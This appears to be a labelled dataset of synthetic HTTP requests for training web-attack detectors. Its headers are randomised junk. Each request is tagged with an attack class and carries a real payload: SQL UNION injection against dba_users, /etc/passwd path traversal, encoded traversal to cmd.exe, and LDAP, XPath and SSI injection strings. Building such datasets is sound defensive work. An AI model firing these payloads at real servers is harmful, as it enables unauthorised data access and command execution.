User-Agent: tNMy0tlU http://www.aione.de
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 953x6132
Via: 0.8 182.92.87.114, 2.4 www.tariw.css
Transfer-Encoding: compress
Upgrade: eEEr/2.5, y9ejm/8.5, Nwaeld/9.4, tc4/7.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44209
Start - Id: 41943
class: SqlInjection
GET /ogzrZuGIMQEv/q7lzF/hSU2id6Xen_8_VcloJHb/ansns0eTer2hun/b4n5btn6/3xyLOKQ_w2Yzf/73IQebdBYQfngfe/c2QM5oaks3dnH6w.mdb?Wzgv=5&lWt=seg&ifyeuadzha=144&UBP8-Ed=ge2c%27%2F**%2FUNION%2F**%2FSELECT%2F**%2FptrhaieUtl%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2FCitm%2F**%2Flike%2F**%2F%27%2525&vAe9=t%7El8betweenr9oiE3tl0se%5D HTTP/1.1
Host: 250.253.251.192
Connection: keep-alive
Accept: image/jpeg;q=0.1, text/plain
Accept-Charset: windows-1251, us-ascii, x-mac-icelandic, x-mac-turkish
Accept-Encoding: 
Accept-Language: eEgmt8a-gvstd, es4ancG-mOesa7, nDrteanf-aSo8Iu, 6Iezoa-n8yba2sA;q=0.2, qari-a
Cache-Control: no-transform
Client-ip: 148.203.206.38
Cookie: a.iIVI=dprm]einsert;ha=snjr - hossauIkuvbscript a;emo2hmov0sl1sr=43929893;U8kd=sehaoal3Ord0hha;irIh7=997;nr9tf=1184048
Cookie2: $Version="8"
Date: Thu, 03 Apr 08 23:50:22 GMT
ETag: "STLwztEysXjjA5_mC8"
Expect: 100-continue
From: erpnsemv@5tAwdogn.st
If-Modified-Since: Tue, 13 Mar 07 17:49:21 GMT
If-Unmodified-Since: Tue, 08 Apr 08 12:28:05 CET
If-Match: *
If-None-Match: "mt-udyq80kMC2wpVQ"
If-Range: Wed, 13 May 09 24:35:46 CET
Max-Forwards: 8172
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: Basic dG1zRWhzOndCQWxsN3Q=
Range: 55660-
Referer: /Ixlopfx/azl1e/i3e5e/5pxdtyEO/eaoG.png
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: b1ephndizel0i
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x2725
Via: 3.6 www.tgEj.jpg, FTP/5.6 www.obacro2e.tiff
Transfer-Encoding: identity
Upgrade: imn/2.9
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41943
Start - Id: 38123
class: LdapInjection
GET /i0k2rsthedarIbe0/l8yGI/axKk9/6erogS/redmmZ/5w9Y_oztelnetE/tH.WZD2eK1/rmzsmcir2/sPa_zcs_Qj9CA/bt8ftef/vOstyle_htaccesl7c6QzY.jpg?oumqaTw9siaci=sservicesnalinkias4Tiawy&rm4nd=%5Be8+h&96rhtaccesW4sV=-&2or=%29++++%28%7C%28ep%3Dtcb8n*%29&rtdrbhirobc=H+eitb1processing-instructionm5a&wr=hFtIaleyonen&q4Eqnxn=nQdaoA&danav=y1eneixnfnyvrb&t1=lee+binttpx%27%27t&IpDLhttpsopen=+risi&dIs8te=67671745&EZGNY=0&gUs2e=542&huSg=%7CHa%26&iintshudepr=55 HTTP/1.0
Host: 21.182.75.29
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 76.39.81.250
Cookie: tpswnytchwotN=1isdf;3rpeuh5slsht=51608
Cookie2: $Version="2"
Date: Tue, 14 Aug 07 04:21:46 CET
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: r0roy@hbe7rHPeNd.st
If-Modified-Since: Fri, 26 Nov 04 13:54:37 GMT
If-Unmodified-Since: Fri, 31 Mar 06 07:11:04 CET
If-Match: "vIbaxHQqUtZ1XmV03qxq"
If-None-Match: *
If-Range: Thu, 07 Jan 10 15:03:14 CET
Max-Forwards: 15
MIME-Version: 2.1
Pragma: sH='srti0'
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest algorithm=MD5-sess
Range: 17768-5
Referer: http://Ncpnssz.org/Sniq/b3c2so/resd.aspx
TE: trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/3.6 (Windows; U; WinNT 7.8; an-mn; rv:8.0.3) Gecko/70546537
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 846x668
Via: 3.4 www.tldoTlna.jpg, HTTP/4.6 133.110.171.24
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38123
Start - Id: 39460
class: SSI
GET /vxNluGK4yDvk/TbCL5/nJijOmGJCxtSIAev.T/ti/eSee6ruNetfems1ipAum.jpg?n6vwzfab=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: www.meraeda8i.st
Connection: snzuefhu
Accept: text/*;q=0.9, audio/*;q=0.7, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress, deflate, identity
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 93.255.83.3
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Date: Sun, 18 Nov 07 19:01:31 UTC
Expect: dmetae=64ihon
If-Modified-Since: Wed, 18 Aug 04 06:12:49 UTC
If-Unmodified-Since: Sat, 02 Jun 07 07:12:15 CET
If-Match: *
If-Range: Sat, 09 Apr 05 10:57:16 CET
Max-Forwards: 32
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Referer: http://www.ahOeim.de/rrtten.nsf
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/2.3 (Windows; U; Windows NT 2.3; iz-el; rv:5.5.1) Gecko/44575846
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
Via: 8.7 203.111.213.156, aice/5.8 www.hosi.js, 7.2 43.65.99.237
Transfer-Encoding: gzip
Upgrade: mwv/5.9, jxt9eh/8.4, lch/8.1, nSc/9.6
Warning: 728 www.fadyet.png "wm9iowri" "Sun, 18 Sep 05 04:10:06 CET"
----: --------------------------------------------

null

End - Id: 39460
Start - Id: 46336
class: PathTransversal
GET /aiazheftt/mU2iBjHx1f13hKyR3IY/rbShjmm/tL@/Nitrt.gif?v8_execGCLV=eNH4nmZ7c&4ID6cAi=moS03g&9e5t=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&oe0mAew3tth7=4httpsbh&n3stqrtMns=pwxQavxphc%40&0ysh8hhocosmrn=eetailMix&4ltaiiflwnsce=rwnqtnntWvd&ceusrdilntTfht=uUqjB2_j&aeaaurc=7laiouunsdhea&KYGyEcc=wjgSYn.6oJ&xRabh=5025413&ooivTfaotog=dcOPWulf HTTP/1.0
Host: 147.159.176.249:0607
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: 5=DootmO
Client-ip: 142.8.138.99
Cookie: hbsn=37;tqVrncmmfiaw=a;etcO3kz=537845;6ojOh0=2ela;imgDfromfnXeua=isao
Cookie2: $Version="16"
Date: Fri, 19 Mar 10 15:29:05 CET
ETag: "cFHA7u2hDckalHKlwq"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Thu, 17 Nov 05 09:47:56 UTC
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "kuWzHXTzh7UY.N64"
If-None-Match: *
If-Range: Sun, 21 Jan 07 18:04:25 UTC
Max-Forwards: 6665
MIME-Version: 3.4
Pragma: Ue=uyd3P
Proxy-Authorization: josyh eeusucc9=tlhwlepi
Authorization: Basic bWFwNXNnZjpkYXNvbg==
Range: 11-897,103770-88,-588131
Referer: /shset/rd6wo.ace
TE: chunked,chunked;q=0.9,deflate
Trailer: If-None-Match
User-Agent: Mozilla/1.5 (Windows; U; WinNT 0.6; t4-m4; rv:0.0.3) Gecko/80400456
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3713x610
Via: FTP/6.3 154.147.197.111:0, FTP/6.2 21.191.231.200
Transfer-Encoding: compress
Upgrade: zetne/3.4, eeirz/9.6, roaisl/4.6, ikirr/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 57915246628562313
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46336
Start - Id: 49926
class: XPathInjection
GET /Yeorf6/a7es0WtI/sA34iu5YtSJRgCaFL/dD1Bd/GxfU/nG-LiaCxU9w4.gif?ntU1ycepbim8Lb3=eer&ru=Ae3lNDiyseta&Ihnhss07Cus=log+s&k8nr7gnoec=503075960&euantIee=eho6p0Hg1&g2t=9&wrnobe2ah=eg1&a3ilboe=etAadi%2Fn%2Fhs2thr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D903%5D+or+++++%27eOa%27+++%3D++%27&olatbs=720&Un=b%5Drdais&msatnsrhNb4oET=r+af+&nkltruecnknfu0=bjla32 HTTP/1.0
Host: 199.192.169.224
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 69.149.110.120
Cookie: FU_eXJ=sXMd7p8;gir8aaer=r7ps;ytnzedqeeE7s=nic;rg0=w'h6bnoecka;uYGU=t62ssinS
Cookie2: $Version="5"
Date: Wed, 15 Jul 09 04:46:37 CET
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Sun, 04 Nov 07 11:22:48 GMT
If-Unmodified-Since: Wed, 30 Jan 08 04:54:59 UTC
If-Match: *
If-None-Match: *
If-Range: "9NtuvThsKoOxD9B6dr9z"
Max-Forwards: 2
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: -3
Referer: /tthl8sT/slh5nm/sindtaem/a3oNZ/hennb.bin
TE: deflate
Trailer: Host
User-Agent: eivtxe3ieI/2.1.0.4.8
UA-CPU: MIPS
UA-Disp: 3308,0110,8
UA-Pixels: 299x2707
Via: FTP/7.9 200.91.248.156, 1.2 www.Wietryu.png, 8.3 180.50.32.187
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49926
Start - Id: 49606
class: XPathInjection
GET /Xb/4h5nsczoEn/nDXBIC9bn2-Hftpg/xC/bE7eA8@ardntl/nwudome/aywMi6Kec0A0B.gif?eaoon=211++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++2329%3D&j2PmnodeaQ1oriCZ=ftloroiirb%3Cql4&estmteei=aii&nsspe67awe=09&7teH8=h6C99IXP&binntEehz6yhf=2 HTTP/1.0
Host: www.noirhLiupT.st
Connection: atoem3o
Accept: text/*;q=0.2
Accept-Charset: iso-8859-15;q=0.3, iso-2022-kr;q=0.2, gb2312;q=0.6
Accept-Encoding: 
Accept-Language: ewnnnnb-hawntae, ta6-i;q=0.8, x8eenbof-ctsulP;q=0.4, he-etaynw;q=0.5
Cache-Control: t='gsjrat'
Client-ip: 126.206.123.83
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="4"
Date: Sun, 01 Nov 09 10:20:27 GMT
ETag: "OmYn45rY5Z5qYtyD0"
Expect: brurn5=ihIa
From: tdaOt@esEtnmNs.it
If-Modified-Since: Sat, 14 Nov 09 09:25:33 UTC
If-Unmodified-Since: Mon, 25 Aug 08 17:06:42 CET
If-Match: "CFMJT9mvKgUvn-J9lB1P"
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 1
MIME-Version: 9.4
Pragma: x=e6
Proxy-Authorization: Hsia5 4xaft=eores4
Authorization: Digest uri=/rreszL5t/vca8O8/mriOJfT/shqsigjb/ne5etolo.mp3
Range: 7852-
Referer: http://www.n8hbt.net/erbnHIvg/5rneerb.jpeg
TE: chunked,trailers,deflate
Trailer: Via
User-Agent: uyrhtranoSKtNfc
UA-CPU: 68000
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 6.4 20.250.59.5, FTP/4.0 197.240.162.53
Transfer-Encoding: teeth; aohrR1ca=tdssarr
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49606
Start - Id: 35626
class: XPathInjection
GET /evukV@cLkvtdnwhrmyG/p6u3see/hobTscriue6ga0N8/eirn5nsiEjsnti/o0a6piYaFnrcJ/hzetd/442VqnAp.msf?nseAueofetenEoo=156&lweycoel=td0dll&fitaorKhts=ntn2&TUSLkc0I@_m=hln&arn9eiif=uD-i+bqpi6andgiHqs%5BE&snrfeht19=hwbXrH%27++or++++%28i+++%3C+++++count%28ee8nai%2Fchild%3A%3Atext%28%29%29+and+j+++++%3C+++count%289s%2Fchild%3A%3Acomment%28%29%29+++and+++k++%3C++count%28sy%2Fchild%3A%3A*%29++++%29+++or+%27eeee%27++%3D%27+++++s1syin%27+++++or&iZanfesdbjonee=+nph-ai4&vMh0utedhrdnu=nsenSftoSebetweennu&nObJh=1&dtl5nn2arbemeee=9589181331&ahsne=771318 HTTP/1.0
Host: www.rlsmfmTf.de
Connection: close
Accept: */*
Accept-Charset: euc-jp;q=0.7, iso-8859-1;q=0.4
Accept-Encoding: compress, compress, compress;q=0.3
Accept-Language: *
Cache-Control: ehkmiNd=q
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Sun, 26 Oct 08 22:08:46 GMT
ETag: W/"XbI56jsXrDoOoTOo"
Expect: 100-continue
From: yehNodot@eblEqjJp.ch
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Thu, 24 Jan 08 02:35:59 UTC
If-Match: "FVl7a6R7GCn3HnUU"
If-None-Match: *
If-Range: "z285ETIARPyp0Sb0Hn.t"
Max-Forwards: 9
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: 0Sri sdeo=1cleT9
Range: 7528-,849-
Referer: http://sati.ch/dtnoet/y6pl.bin
TE: trailers,chunked;q=0.6,trailers
Trailer: Upgrade
User-Agent: ewqFuk http://www.boawse8e.uk
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 8.5 www.isg0sh.png, FTP/1.6 133.211.81.230, HTTP/3.9 30.138.23.125
Transfer-Encoding: identity
Upgrade: natE8s/5.8
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35626
Start - Id: 46262
class: PathTransversal
GET /dbUtboeiu/e1lAbuOGji01J6JMF7/wCTDo.DbodyYMZxp_/cSL9r80G4IK2tDW.cfm?9harEss=321708&Ie=ebgqOV7RGGQC&s8sot=5&ae4StdSstwes=716090&1usgsettF=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&m66rcsahkt0=esmRla5oyyedorrpi&ok=sdB1xZCBx%4005&hlEorklu=p+&xhsfls=18&nhlEni=tta0%26 HTTP/1.0
Host: 69.105.210.110
Connection: hISu9e
Accept: text/*, audio/x-wav
Accept-Charset: x-mac-ce;q=0.1, x-mac-greek;q=0.5, x-mac-korean;q=0.7, iso-8859-4;q=0.1, iso-8859-4;q=0.9
Accept-Encoding: deflate, identity;q=0.5, deflate
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 117.131.231.99
Cookie: fhF3ZTjs=hia
Cookie2: $Version="03"
Date: Tue, 05 Jan 10 10:37:27 CET
ETag: "VNc9YS_adiG6@ph7"
Expect: 5hrhmAa=eezafs
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 19 Oct 06 21:49:57 UTC
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: *
If-None-Match: "rE1Uw2SCuKqCi7o"
If-Range: *
Max-Forwards: 450
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: cibEh 2hct8=naasvou
Range: 723-2
Referer: /easTr/ediRreIc.tiff
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/6.6 (compatible; MSIE 0.3; Unix; otOpwiz; mPd8; r5pu)
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 2.6 50.228.97.226
Transfer-Encoding: compress
Upgrade: roeie/1.4
Warning: 196 158.163.201.157 "scotgrnti" "Tue, 25 Mar 08 07:11:27 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46262
Start - Id: 36477
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.dznn.cz:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-2;q=0.6, utf-8, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 92.39.253.160
Cookie: se6eibF=rdqnpezziidIty;i2xsfem=an1creb9;9aijsg=58896;rdctaiwGetfsrH=tscriptoaognwhtpasseft
Cookie2: $Version="987"
Date: Sun, 12 Sep 04 20:56:49 UTC
ETag: "b.tqILcRPgjyibN"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Wed, 09 Apr 08 10:25:34 CET
If-Unmodified-Since: Wed, 29 Jun 05 24:28:26 CET
If-Match: "QZD.TK-Qom_HbzY_.p"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 436
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM d09jRGlnc2VnaWJyZWthdDk0bWU3NzlpbW5qbk9zRXNoZGx0TWVuVWRhb3Fvbw==
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 57-,410056-,436232-1281
Referer: /oihaep/ooEspv/ynnTx/Uede/ahemodh.jpeg
TE: trailers,deflate
Trailer: Authorization
User-Agent: virlO/4.8
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 0.2 195.202.24.221:66427, FTP/4.4 182.0.72.61, HTTP/4.6 180.189.39.27
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36477
Start - Id: 35484
class: XPathInjection
GET /gOM/eIshsCxot/e8sftgreidftaesqepth/tT16uFiMTg@S-GPIW5zh/n6JVxUJ_EHmVxZZ/sZ@0WS-B/toxtpvnehki/jgxksTnintrctei/neuraEsasaiqyec5f/eeO8lid/@8JnVnknodes9yT7yw/5D3UPDKguH2zMVu6.swf?efscraisd=sojTm5Hh&ohou=uxtwlrwp-aN%5C%29inun+k%3Che&Srihilu6T7e=085&hnrO62rolo=7eTa3KEjcpnd0negej&wnh4=l17rdRK HTTP/1.0
Host: www.spsoa.ch
Connection: nrEaoO
Accept: application/postscript, application/*;q=0.9, text/html
Accept-Charset: x-mac-greek, windows-1253, windows-1255;q=0.5, cp-936, windows-874
Accept-Encoding: fr' or    (i   <   count(io/child::text())  and     j   <     count(frl/child::comment()) and     k     <  count(nqArt/child::*)   ) or 'aPGg7'  =   '   zheho' or
Accept-Language: milf-sxriTga;q=0.5, apahDs-feonFuc, iuie8edu-rm1rlhp, sye5rdon-ey
Cache-Control: no-cache
Client-ip: 28.193.148.19
Cookie: uueih=86403845;ttuhcDeukshor=wqqaY3fVMqqo;f1qhs1nesaDp=aj?oij4$ae iopth7;rdhrghoe6egXr=|desivifromAKvtw
Date: Thu, 19 Jan 06 01:16:50 GMT
ETag: W/"moDPEbNMHT42qaJj8ObB"
From: s3ut@xt9iriil5b.ch
If-Unmodified-Since: Mon, 26 Jun 06 18:10:55 GMT
If-None-Match: *
Max-Forwards: 915
Pragma: Ctlc='nhtoG'
Authorization: NTLM eTI5N29oY2R1bmVhQW5jY3RmaWRzbXJ4ZVNhYjRsaXNlcXBhSTNoY2U=
Referer: http://aohoLss.com/etnb.asp
User-Agent: e6mRomrn/2.4.1.6.9
UA-Disp: 5923,344,8
Transfer-Encoding: deflate
Upgrade: rin/2.9, risq/5.7, tEode/5.9

null

End - Id: 35484
Start - Id: 36949
class: LdapInjection
POST /H7XOLbetweenKZIw8/n_2AmUNpCwQ.mdb? HTTP/1.0
Content-Length: 115
Content-Language: ro8det4,geRYhi,nwsevoi2
Content-Encoding: identity
Content-Location: /ePhirie/nflsnsa/ttgmrrf/amaeiout/ssl67.txt
Content-MD5: MmRmNXJ1RWx1YkV3dHUwcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Feb 04 19:50:16 GMT
Last-Modified: Thu, 12 Mar 09 04:17:05 GMT
Host: www.lgSTs.com:276
Connection: ntyoiuU
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish;q=0.8, x-mac-greek;q=0.3, iso-10646-ucs-2;q=0.5, cp-932, x-mac-turkish;q=0.7
Accept-Encoding: gzip;q=0.4, deflate;q=0.7, gzip, deflate, compress;q=0.9
Accept-Language: *;q=0.6
Cache-Control: max-stale=0548
Client-ip: 210.150.165.208
Cookie: ff=ffWOrBDK;SVKKQ-rtB7l=i773ldbuw;etmn8n=rJOwbFVrCUv
Cookie2: $Version="3"
Date: Fri, 05 Dec 08 11:33:54 GMT
ETag: W/"IXXTS.lbD8lH1hAwQMAy"
Expect: 100-continue
From: k3lyu19i@ehrsdtSbow.biz
If-Modified-Since: Tue, 19 Apr 05 20:22:46 CET
If-Unmodified-Since: Wed, 12 May 04 05:23:44 CET
If-Match: "T8--dE@@h@NLpZJMr1W"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: rIrMa lEwr=evhe
Authorization: Digest username="rr5tnz"
Range: 707-,38-117309
Referer: /abnl/6ewft/zaofr4o.swf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: 88bd9OEioibklektafy
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3317x800
Via: tnonKy/7.2 www.gEticw.js
Transfer-Encoding: gzip
Upgrade: 7nr/8.5, fbe/4.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e81kytltwjwR=)    (   |  (displayName=had*)  (name    =  had*  )(mail=had*)&om7r090M9=nt6sw

End - Id: 36949
Start - Id: 43730
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 156.233.154.60
Connection: close
Accept: image/png, video/*;q=0.4
Accept-Charset: iso-8859-2, big5, iso-2022-jp, hz-gb-2312
Accept-Encoding: gzip, gzip;q=0.4, identity, gzip
Accept-Language: *;q=0.9
Cache-Control: min-fresh=4667
Client-ip: 216.86.105.67
Cookie: UBlsfMbodyIG_=961739421;7ITF=tpe;le=0ily;mhnretrhfeneEsN=375412;bgmteolet=3r@mmoouniontlcaq-sqFc ;lue1ai9ht0ep=tco
Cookie2: $Version="6"
Date: Fri, 23 May 08 14:57:06 GMT
ETag: "47mVLi4C04269L-1r"
Expect: eiy7a
From: uhbqiisi@rmieagr.org
If-Modified-Since: Thu, 30 Jun 05 12:50:28 CET
If-Unmodified-Since: Thu, 06 May 04 19:27:22 CET
If-Match: "jHIL3cf8xKPp@wU"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 6644
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bnZzYWFFc2w6YWR1Y2R0cw==
Range: 7008-71
Referer: /raO4eRtn/a56xne/0aapz.jsp
TE: gzip,chunked;q=0.9,gzip;q=0.7
User-Agent: etsThdlcnimhxlint
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: FTP/7.5 181.6.95.168, 1.8 www.l6ye.htm, HTTP/1.7 www.donk.jpeg
Transfer-Encoding: kilOte; sCgne=gsno
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 601406
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43730
Start - Id: 49500
class: XPathInjection
GET /ssi3bYFG/eZSgUvX.CkxTJ74DLrfN/afrnty2e0useuiaal/h9TTC6Fo26LQOIq8vHT/mf/so3eamicsesea0oFTtps/nS5.PYzX7B/xoU.js?bwdi5e0jlsv=p++a&ai=Gbido%27++or+++4q4v%2Fwfa3%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D465%5D++or+++++%27y1tvthye%27+++%3D++++%27&tlemeFnaszt=3207457627&ENprpolqinOhad=y%3Fcol%29rovhttpsU28 HTTP/1.0
Host: www.ntfribe.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: kneg1-nGqcd;q=0.0
Cache-Control: max-age=1
Client-ip: 223.242.155.63
Cookie: twpt=oabzim0;um9eak=lcmnr>an)tiA;awzcteisdi=oCbmcAI8W5r;eahinp=898832;ef4ddyeef8ioiay=oa;cmoerHxsc=acolStat8l
Cookie2: $Version="238"
Date: Sat, 30 Sep 06 10:43:49 CET
ETag: W/"vdwNvb46rS8r1KeBCz3"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Thu, 08 Nov 07 10:37:50 CET
If-Unmodified-Since: Sat, 19 Jun 04 06:56:04 CET
If-Match: "w7U_LuQnnG@u_ZoyO"
If-None-Match: "p9MTEzSs1941HKOsl"
If-Range: "jnblAhp6SZjGzWAH9"
Max-Forwards: 2025
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: oou7tu fstmaHe6=oaua
Authorization: urdmey er4o=atlis
Range: 2-801463,7709-,5-5829
Referer: http://www.NmieIt3.net/StpAk2n.exe
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 5.0; 4n-w7; rv:5.6.9) Gecko/70740911
UA-CPU: 68000
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4726x3292
Via: 7.6 171.145.143.112, FTP/0.0 15.145.31.115
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
